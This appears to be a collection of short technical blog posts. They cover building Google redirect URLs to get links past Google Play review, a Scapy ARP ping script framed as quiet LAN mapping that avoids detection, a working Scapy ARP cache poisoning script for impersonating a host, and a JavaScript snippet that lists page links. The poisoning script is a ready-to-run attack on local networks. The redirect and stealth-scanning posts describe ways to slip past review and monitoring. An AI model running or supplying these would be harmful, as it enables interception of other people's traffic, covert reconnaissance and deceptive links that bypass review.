Using Google to redirect to a URL

Google uses ‘https://www.google.com/url’ to redirect and track clicks in Google’s search engine, we can use that to redirect to anywhere through Google’s system. Google Play will not reject that URL because it originates from Google’s domain name.

You can use Google’s URL redirection service to create a Google URL which will redirect to your desired address.

Let’s say we want to create a redirection for the URL https://www.aviran.org through Google, the first stage is to search that URL in Google’s search engine.
The first result links to the URL we want, we will use that result for our redirection.

As I explained before, the search results Google displays do not link directly to the URL they show, all the results are links to ‘https://www.google.com/url’ and supplementary variables with the redirection info. In our example, when searching for www.aviran.org the first result that links to www.aviran.org actually links to:

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CC0QFjAA&url=http%3A%2F%2Fwww.aviran.org%2F&ei=t2VQUreoCpHE4gTBsoCADQ&usg=AFQjCNGhf8lO9od6sdHlrMLXuWZ2AD0qzA&sig2=Y11U7GSqZAKFBtvcq4dRFw&bvm=bv.53537100,d.bGE

We can work with that to create a less crude URL for our needs, we can get rid of most of the get variables, the variables we have to keep are sa, url, usg and their values.

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CC0QFjAA&url=http%3A%2F%2Fwww.aviran.org%2F&ei=t2VQUreoCpHE4gTBsoCADQ&usg=AFQjCNGhf8lO9od6sdHlrMLXuWZ2AD0qzA&sig2=Y11U7GSqZAKFBtvcq4dRFw&bvm=bv.53537100,d.bGE

After removing the unnecessary GET variables we are left with:
http://www.google.com/url?sa=t&url=http%3A%2F%2Fwww.aviran.org%2F&usg=AFQjCNGhf8lO9od6sdHlrMLXuWZ2AD0qzA

A Google URL which will lead to www.aviran.org – Mission Accomplished!

ARP ping with Python and Scapy

Usually we use the ping command to check if a machine exists at the address we ping, if we get a reply (Pong!) we know there’s a machine at that address. The traditional ping works using the ICMP protocol and sends icmp-echo-request (Ping) and icmp-echo-reply (Pong) packets. A machine can choose to ignore the echo requests and don’t reply in order to hide itself.

We can use the ARP protocol which is used to resolve MAC addresses of hosts to ping machine on a local area network. We can use that technique to map a LAN in a less obvious way and hope to avoid detection by a diligent sysadmin.

Here’s a Python script that uses the Scapy library to preform a ARP ping on a single target.

#!/usr/bin/python

# Sends an arp resolution request on broadcast for an IP address
# If reply is received within timeout the host is alive
# aviran.org

from scapy.all import *
import sys

Timeout=2

if len(sys.argv) != 2:
    print "Usage: arp_ping.py IP"
    sys.exit(1)
   
   
answered,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]),timeout=Timeout,verbose=False)


if len(answered) > 0:
    print answered[0][0].getlayer(ARP).pdst, "is up"
elif len(unanswered) > 0:
    print unanswered[0].getlayer(ARP).pdst, " is down"

ARP poisoning using Python and Scapy

What is ARP poisoning
Machines on a TCP/IP local area network identify each other and communicate using the physical addresses of their network adapters (MAC address). Every machine keeps a list (cache) of neighboring machines and their MAC addresses, if that list is contaminated, i.e a machine on that list will have the wrong MAC address. All communication to that machine will be directed to the wrong machine.
ARP poisoning is the method of tricking a machine to save data on about an IP address with the wrong MAC address in it’s ARP table.

How the script works
The following script gets two arguments
HOST_TO_ATTACK – The machine we want to poison
HOST_TO_IMPERSONATE – The machine we want the poisoned machine to think we are, so when it want to communicate with that machine, it will actually communicate with us.

The script queries the target machine for it’s mac address by sending an who-has packet to broadcast.
The who-has packet has fake source IP address coupled with the attacker MAC address.
When the target gets the who-has packet the target will store the false IP and MAC address data in it’s ARP table.

#!/usr/bin/python

# Python arp poison example script
# Written by aviran
# visit for more details aviran.org

from scapy.all import *
import sys

def get_mac_address():
	my_macs = [get_if_hwaddr(i) for i in get_if_list()]
	for mac in my_macs:
		if(mac != "00:00:00:00:00:00"):
			return mac
Timeout=2

if len(sys.argv) != 3:
    print "Usage: arp_poison.py HOST_TO_ATTACK HOST_TO_IMPERSONATE"
    sys.exit(1)

	
my_mac = get_mac_address()
if not my_mac:
	print "Cant get local mac address, quitting"
	sys.exit(1)

packet = Ether()/ARP(op="who-has",hwsrc=my_mac,psrc=sys.argv[2],pdst=sys.argv[1])

sendp(packet)

An easy way to get all the link URLs of a webpage

Open the javascript console in your browser, if you’re using Chrome hit CTRL+SHIFT+J and if you’re using Firefox CTRL+SHIFT+K will display the console.

Input the following code and you will get a list of the addresses all the HTML anchors are pointing at.

links = document.links;
for (i = 0; i < (links.length); i++) {
   console.log(links[i].href);
}

links[i] is an HTMLAnchorElement, if you need different property about the href tag just get a different property of HTMLAnchorElement.